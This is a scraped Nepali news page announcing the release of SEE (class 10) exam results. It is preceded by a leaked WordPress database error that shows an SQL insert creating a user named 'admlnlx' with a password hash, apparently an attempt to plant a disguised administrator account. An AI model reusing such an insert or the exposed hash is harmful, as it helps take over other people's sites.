WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BWRLKKRVW0Uin7YebPqQgtC6eLfF5E.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-23 15:15:52', '', 'admlnlx', 'admlnlx')

एसईईको नतिजा आज सारवजनिक हुँदै – Gaule Khabar

एसईईको नतिजा आज सारवजनिक हुँदै

एसईईको नतिजा आज सारवजनिक हुँदै

गाउँले न्युज, १२ असार, काठमाडौँ । माध्यमिक शिक्षा (एसईई) परीक्षाको नतिजा आज बिहीबार सार्वजनिक हुने भएको छ । परीक्षाको नतिजा सार्वजनिक गर्न बिहीबार दिउँसो १ बजे बोर्ड बैठक डाकिएको छ ।
राष्ट्रिय परीक्षा बोर्ड, कक्षा १० का परीक्षा नियन्त्रक विष्णुप्रसाद अधिकारीले बोर्डले निर्णय गरेपछि परीक्षाफल सार्वजनिक गरिने जानकारी दिए । बोर्डका अनुसार नतिजा हेर्न कम्तीमा अपराह्न ३ बजेसम्म प्रतीक्षा गर्नुपर्ने हुन्छ । २०७५ सालको चैत्र १० गतेबाट सुरु भएको एसईई परीक्षामा करिब चार लाख ७५ हजार परीक्षार्थीले सहभागीता जनाएका थिए ।

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका